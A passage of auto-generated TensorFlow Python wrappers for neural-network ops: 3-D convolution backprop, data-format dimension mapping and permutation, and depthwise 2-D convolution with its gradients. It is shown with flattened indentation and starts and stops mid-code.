except (TypeError, ValueError):
result = _dispatch.dispatch(
conv3d_backprop_filter_v2, (), dict(input=input,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropFilterV2", input=input, filter_sizes=filter_sizes,
out_backprop=out_backprop, strides=strides,
padding=padding, data_format=data_format,
dilations=dilations, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
conv3d_backprop_filter_v2, (), dict(input=input,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropFilterV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropFilterV2 = tf_export("raw_ops.Conv3DBackpropFilterV2")(_ops.to_raw_op(conv3d_backprop_filter_v2))
def conv3d_backprop_filter_v2_eager_fallback(input, filter_sizes, out_backprop, strides, padding, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_filter_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, out_backprop) = _inputs_T
filter_sizes = _ops.convert_to_tensor(filter_sizes, _dtypes.int32)
_inputs_flat = [input, filter_sizes, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"data_format", data_format, "dilations", dilations)
_result = _execute.execute(b"Conv3DBackpropFilterV2", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropFilterV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d_backprop_input(input, filter, out_backprop, strides, padding, dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the input.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`.
Shape `[batch, depth, rows, cols, in_channels]`.
filter: A `Tensor`. Must have the same type as `input`.
Shape `[depth, rows, cols, in_channels, out_channels]`.
`in_channels` must match between `input` and `filter`.
out_backprop: A `Tensor`. Must have the same type as `input`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropInput", name, input, filter, out_backprop,
"strides", strides, "padding", padding, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_input_eager_fallback(
input, filter, out_backprop, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropInput", input=input, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropInput = tf_export("raw_ops.Conv3DBackpropInput")(_ops.to_raw_op(conv3d_backprop_input))
def conv3d_backprop_input_eager_fallback(input, filter, out_backprop, strides, padding, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter, out_backprop], ctx, [_dtypes.half, _dtypes.float32, _dtypes.float64, ])
(input, filter, out_backprop) = _inputs_T
_inputs_flat = [input, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding, "dilations",
dilations)
_result = _execute.execute(b"Conv3DBackpropInput", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d_backprop_input_v2(input_sizes, filter, out_backprop, strides, padding, data_format="NDHWC", dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the input.
Args:
input_sizes: A `Tensor`. Must be one of the following types: `int32`, `int64`.
An integer vector representing the tensor shape of `input`,
where `input` is a 5-D
`[batch, depth, rows, cols, in_channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[depth, rows, cols, in_channels, out_channels]`.
`in_channels` must match between `input` and `filter`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
1-D tensor of length 5. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropInputV2", name, input_sizes, filter,
out_backprop, "strides", strides, "padding", padding, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_input_v2_eager_fallback(
input_sizes, filter, out_backprop, strides=strides, padding=padding,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropInputV2", input_sizes=input_sizes, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding, data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"), "Tshape",
_op._get_attr_type("Tshape"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropInputV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropInputV2 = tf_export("raw_ops.Conv3DBackpropInputV2")(_ops.to_raw_op(conv3d_backprop_input_v2))
def conv3d_backprop_input_v2_eager_fallback(input_sizes, filter, out_backprop, strides, padding, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([filter, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(filter, out_backprop) = _inputs_T
_attr_Tshape, (input_sizes,) = _execute.args_to_matching_eager([input_sizes], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
_inputs_flat = [input_sizes, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"data_format", data_format, "dilations", dilations, "Tshape", _attr_Tshape)
_result = _execute.execute(b"Conv3DBackpropInputV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropInputV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def data_format_dim_map(x, src_format="NHWC", dst_format="NCHW", name=None):
r"""Returns the dimension index in the destination data format given the one in
the source data format.
Args:
x: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A Tensor with each element as a dimension index in source data format.
Must be in the range [-4, 4).
src_format: An optional `string`. Defaults to `"NHWC"`.
source data format.
dst_format: An optional `string`. Defaults to `"NCHW"`.
destination data format.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DataFormatDimMap", name, x, "src_format", src_format,
"dst_format", dst_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return data_format_dim_map_eager_fallback(
x, src_format=src_format, dst_format=dst_format, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DataFormatDimMap", x=x, src_format=src_format, dst_format=dst_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "src_format",
_op.get_attr("src_format"), "dst_format",
_op.get_attr("dst_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DataFormatDimMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DataFormatDimMap = tf_export("raw_ops.DataFormatDimMap")(_ops.to_raw_op(data_format_dim_map))
def data_format_dim_map_eager_fallback(x, src_format, dst_format, name, ctx):
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
_inputs_flat = [x]
_attrs = ("T", _attr_T, "src_format", src_format, "dst_format", dst_format)
_result = _execute.execute(b"DataFormatDimMap", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DataFormatDimMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def data_format_vec_permute(x, src_format="NHWC", dst_format="NCHW", name=None):
r"""Permute input tensor from `src_format` to `dst_format`.
Input tensor must be a vector of size 4, or a 4x2 tensor.
For example, with `src_format` of `NHWC`, `dst_format` of `NCHW`, and inputs:
```
[1, 2, 3, 4]
```
and
```
[[1, 2, 3, 4],
[5, 6, 7, 8]]
```
, the outputs will be (respectively):
```
[1, 4, 2, 3]
```
and
```
[[1, 4, 2, 3],
[5, 8, 6, 7]]
```
Args:
x: A `Tensor`. Must be one of the following types: `int32`, `int64`.
Vector of size 4 or Tensor of shape (4, 2) in source data format.
src_format: An optional `string`. Defaults to `"NHWC"`.
source data format.
dst_format: An optional `string`. Defaults to `"NCHW"`.
destination data format.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DataFormatVecPermute", name, x, "src_format", src_format,
"dst_format", dst_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return data_format_vec_permute_eager_fallback(
x, src_format=src_format, dst_format=dst_format, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DataFormatVecPermute", x=x, src_format=src_format,
dst_format=dst_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "src_format",
_op.get_attr("src_format"), "dst_format",
_op.get_attr("dst_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DataFormatVecPermute", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DataFormatVecPermute = tf_export("raw_ops.DataFormatVecPermute")(_ops.to_raw_op(data_format_vec_permute))
def data_format_vec_permute_eager_fallback(x, src_format, dst_format, name, ctx):
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
_inputs_flat = [x]
_attrs = ("T", _attr_T, "src_format", src_format, "dst_format", dst_format)
_result = _execute.execute(b"DataFormatVecPermute", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DataFormatVecPermute", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def depthwise_conv2d_native(input, filter, strides, padding, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes a 2-D depthwise convolution given 4-D `input` and `filter` tensors.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, channel_multiplier]`, containing
`in_channels` convolutional filters of depth 1, `depthwise_conv2d` applies
a different filter to each input channel (expanding from 1 channel to
`channel_multiplier` channels for each), then concatenates the results
together. Thus, the output has `in_channels * channel_multiplier` channels.
```
for k in 0..in_channels-1
for q in 0..channel_multiplier-1
output[b, i, j, k * channel_multiplier + q] =
sum_{di, dj} input[b, strides[1] * i + di, strides[2] * j + dj, k] *
filter[di, dj, k, q]
```
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
horizontal and vertices strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
filter: A `Tensor`. Must have the same type as `input`.
strides: A list of `ints`.
1-D of length 4. The stride of the sliding window for each dimension
of `input`.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DepthwiseConv2dNative", name, input, filter, "strides",
strides, "padding", padding, "explicit_paddings", explicit_paddings,
"data_format", data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return depthwise_conv2d_native_eager_fallback(
input, filter, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DepthwiseConv2dNative", input=input, filter=filter, strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DepthwiseConv2dNative", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DepthwiseConv2dNative = tf_export("raw_ops.DepthwiseConv2dNative")(_ops.to_raw_op(depthwise_conv2d_native))
def depthwise_conv2d_native_eager_fallback(input, filter, strides, padding, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
_result = _execute.execute(b"DepthwiseConv2dNative", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DepthwiseConv2dNative", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def depthwise_conv2d_native_backprop_filter(input, filter_sizes, out_backprop, strides, padding, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of depthwise convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape based on `data_format`. For example, if
`data_format` is 'NHWC' then `input` is a 4-D `[batch, in_height,
in_width, in_channels]` tensor.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 4-D
`[filter_height, filter_width, in_channels, depthwise_multiplier]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape based on `data_format`.
For example, if `data_format` is 'NHWC' then
out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DepthwiseConv2dNativeBackpropFilter", name, input,
filter_sizes, out_backprop, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return depthwise_conv2d_native_backprop_filter_eager_fallback(
input, filter_sizes, out_backprop, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DepthwiseConv2dNativeBackpropFilter", input=input,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DepthwiseConv2dNativeBackpropFilter = tf_export("raw_ops.DepthwiseConv2dNativeBackpropFilter")(_ops.to_raw_op(depthwise_conv2d_native_backprop_filter))
def depthwise_conv2d_native_backprop_filter_eager_fallback(input, filter_sizes, out_backprop, strides, padding, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, out_backprop) = _inputs_T
filter_sizes = _ops.convert_to_tensor(filter_sizes, _dtypes.int32)
_inputs_flat = [input, filter_sizes, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
_result = _execute.execute(b"DepthwiseConv2dNativeBackpropFilter", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def depthwise_conv2d_native_backprop_input(input_sizes, filter, out_backprop, strides, padding, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of depthwise convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`.
An integer vector representing the shape of `input`, based
on `data_format`. For example, if `data_format` is 'NHWC' then
`input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape
`[filter_height, filter_width, in_channels, depthwise_multiplier]`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
4-D with shape based on `data_format`.
For example, if `data_format` is 'NHWC' then
